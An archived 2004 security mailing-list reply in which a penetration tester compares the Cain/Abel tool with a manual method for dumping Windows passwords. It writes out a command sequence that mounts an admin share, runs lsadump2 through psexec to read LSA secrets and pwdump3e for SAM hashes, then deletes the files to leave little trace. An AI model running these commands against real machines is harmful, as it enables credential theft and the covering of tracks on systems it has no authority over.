Re: Cached NT/W2k passwords

From: Kurt Grutzmacher (grutz@jingojango.net)
Date: Sun May 23 2004 - 17:05:54 EDT


> You can get the password of the currently logged in user with Cain
> It's the most easiest method to dump all the passwords in the system,
> Including the passwords in the protected storage component of windows.

Correct, but not complete. Abel (the remote part of Cain) only pulls the
SAM table (pwdump) and LSA secrets (lsadump). It also requires that Abel
be installed and running which can be a boundary issue from a
tester/client relationship. I like its additional features but, IMHO,
it's a bit more cumbersome to install. I'm not a big fan of losing
control over installation (point-and-click)

If you're trying to keep things off of a client's machine that could be
used by a separate party (like Abel) then you're better off doing
something like this:

net use z: \\server\c$ pw /u:administrator
copy lsadump2.exe c:\
copy dumplsa.dll c:\
psexec \\server c:\lsadump2
del z:\lsadump2.exe z:\dumplsa.dll
pwdump3e server

Yeah, you've got the admin password and it may have been insanely easy
to get -- but you're not installing a listening package like Abel that
could be controlled by an outsider. The only thing left on the remote
machine is PSEXECSVC.EXE which can be done away with rather easily.

I think the original poster (and many others like us :-) want to find
the cached Windows logon passwords. It used to be in lsass memory but an
upcoming patch is going to "fix" it. It's got to be stored somewhere
since XP/2003 must be backwards compatible.



This archive was generated by hypermail 2.1.7 : Sat Apr 12 2008 - 10:53:55 EDT